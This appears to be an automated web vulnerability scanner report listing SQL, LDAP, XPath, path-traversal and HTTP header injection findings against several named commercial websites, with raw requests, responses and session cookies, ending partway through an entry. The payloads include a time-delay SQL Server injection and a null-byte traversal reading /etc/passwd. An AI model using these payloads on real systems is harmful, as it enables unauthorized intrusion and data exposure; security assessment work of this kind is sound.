HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:33:53 GMT Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 14:33:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:33:54 GMT Content-Length: 27726 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)'; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:16:33 GMT Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 14:16:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:16:33 GMT Content-Length: 27727 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <body class="error404" id="bodyID"> ...[SNIP]...
Request 2
GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)''; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
HTTP/1.1 502 Bad Gateway Content-Type: text/html Expires: Mon, 02 May 2011 14:17:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:17:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107
<html><body><h1>502 Bad Gateway</h1> The server returned an invalid or incomplete response. </body></html>
The qcsegs cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the qcsegs cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:20:26 GMT Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 14:20:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:20:26 GMT Content-Length: 27727 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <body class="error404" id="bodyID"> ...[SNIP]...
Request 2
GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
HTTP/1.1 502 Bad Gateway Content-Type: text/html Expires: Mon, 02 May 2011 14:21:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:21:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107
<html><body><h1>502 Bad Gateway</h1> The server returned an invalid or incomplete response. </body></html>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /topic%2527/feed/ HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 503 Service Unavailable Server: Varnish Retry-After: 0 Content-Type: text/html; charset=utf-8 Content-Length: 419 X-Varnish: 1026560449 Expires: Mon, 02 May 2011 14:28:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:28:25 GMT Connection: close
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>503 Service Unavailabl ...[SNIP]... <h1>Error 503 Service Unavailable</h1> ...[SNIP]...
Request 2
GET /topic%2527%2527/feed/ HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:28:31 GMT ETag: "125a6da3d287aa017e47cee5719e8da6" Content-Type: text/xml; charset=UTF-8 backend-server: app135 X-Varnish: 1026561083 Expires: Mon, 02 May 2011 14:28:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:28:31 GMT Content-Length: 942 Connection: close
1.32. http://www.glam.com/topic/feed/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.glam.com
Path:
/topic/feed/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 63192 milliseconds to respond to the request, compared with 172 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /topic/feed/?1',0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 13880390%20or%201%3d1--%20 and 13880390%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
1.34. http://www.wiseshop.com/shop.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.wiseshop.com
Path:
/shop.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /shop.php?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.wiseshop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;
Response 1
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 15:05:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 15:05:49 GMT Content-Length: 24249 Connection: close Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="4777db28467cd55a311f ...[SNIP]... <span class="post">from Springfield, IL</span></span> <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from New York, NY</span></span> <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Beaver, WV</span></span> <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span> </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Pinedale, WY</span></span> <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span> <div class="recommended_product"> <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Sp ...[SNIP]...
Request 2
GET /shop.php?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.wiseshop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;
Response 2
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 15:05:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 15:05:49 GMT Content-Length: 24237 Connection: close Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="4777db28467cd55a311f ...[SNIP]... <span class="post">from Hastings, NE</span></span> <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from Logan, UT</span></span> <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span> </div></li><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Davenport, IA</span></span> <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span> </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child"> <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Newport, RI</span></span> <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span> <div class="recommended_product"> <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Speake ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
body { background-color: #fff; margin: 40px; font-family: Lucida Grande, Verdana, Sans-serif; font-size: 12px; color: #000 ...[SNIP]... <p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p> ...[SNIP]...
The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.
The pid parameter appears to be vulnerable to LDAP injection attacks.
The payloads 9cedc10e48d229ef)(sn=* and 9cedc10e48d229ef)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The ci parameter appears to be vulnerable to LDAP injection attacks.
The payloads 8c2b229d97e563c0)(sn=* and 8c2b229d97e563c0)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application appears to be using the ASP.NET XPath APIs.
Request
GET /appointment-scheduling'/ HTTP/1.1 Host: www.patlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 02 May 2011 15:05:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8950
<html> <head> <title>Expression must evaluate to a node-set.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p ...[SNIP]... </b>System.Xml.XPath.XPathException: Expression must evaluate to a node-set.<br> ...[SNIP]... <pre>
[XPathException: Expression must evaluate to a node-set.] MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeType) +3961158 MS.Internal.Xml.XPath.XPathParser.ParseStep(AstNode qyInput) +77 MS.Internal.Xml.XPath.XPathParse ...[SNIP]...
5. HTTP header injectionpreviousnext There are 10 instances of this issue:
The value of REST URL parameter 1 is copied into the Location response header. The payload 82519%0d%0a8220753ce5b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 46093%0d%0aba45031a507 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the ES cookie is copied into the Set-Cookie response header. The payload fd770%0d%0a517a9219aec was submitted in the ES cookie. This caused a response containing an injected HTTP header.
The value of the exch request parameter is copied into the x-mm-debug response header. The payload d49c0%0d%0a33877e5090a was submitted in the exch parameter. This caused a response containing an injected HTTP header.
The value of the lid request parameter is copied into the Location response header. The payload 9cbce%0d%0a676b5b556a6 was submitted in the lid parameter. This caused a response containing an injected HTTP header.
Request
GET /link/tplimage?lid=9cbce%0d%0a676b5b556a6&pubid=21000000000176230 HTTP/1.1 Host: clickserve.cc-dt.com Proxy-Connection: keep-alive Referer: http://www30a2.glam.com/gad/glamadapt_srv.act?;ga_output=html;ga_exadvids=50000417,50001916,2457154;ga_exadids=5000019254;_ge_=6^2^8e20d085342adacae9cc80362f9e8842;ga_adb=ade;sid=116391130334874196611;browser=2;co=US;dma=511;;;;flg=72;;zone=/;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;pec=f;vec=st;vpec=st;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2696;qc=2693;qc=2692;qc=2690;qc=1988;qc=1902;atf=u;pfl=0;dt=s;!c=hagl;!c=hagn;art=232152_f8f;pt=0;afid=356541251;dsid=695190;;tt=i;u=b023179zhfv1qn3jidi,f0fu2sa,g100020;sz=728x90;tile=1;ord=7226277049630880;;afid=356541251;dsid=695190;url=s0a4ra;seq=1;ux=f-fu2sa,tid-1,pid-79zhfv1qn3jidi,aid-3,i-1,g-72,1,;_glt=300:1:13:4:30:761:2011:5:2;a_tz=-300;_g_cv=2;;;dsid=695190;nt=g;cc=us;ec=ron;p=0;p=1;!c=m;!c=sf;cl=050168;cl=051194;ec=tb;ec=tf;ia=mf;pec=f;rmt=exp;vec=st;vpec=st;;dt=s;!c=hagl;!c=hagn;;lbt=nbt;sbt=bc;sbt=fa;sbt=b;sbt=ec;sbt=lf;sbt=lh;sbt=lhe;sbt=f;sbt=s;sbt=fc;sbt=fp;sbt=bcb;sbt=bcf;sbt=bh; User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 13:29:00 GMT Server: Apache/1.3.41 (Unix) Location: http://gan.doubleclick.net/gan_impression?lid=9cbce 676b5b556a6&pubid=21000000000176230 Content-Type: text/html; charset=iso-8859-1 Expires: Mon, 02 May 2011 13:29:00 GMT Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://gan.doubleclick.net/gan_impression?lid=9cbc ...[SNIP]...
The value of the pubid request parameter is copied into the Location response header. The payload 391ec%0d%0a7c35b386e75 was submitted in the pubid parameter. This caused a response containing an injected HTTP header.
Request
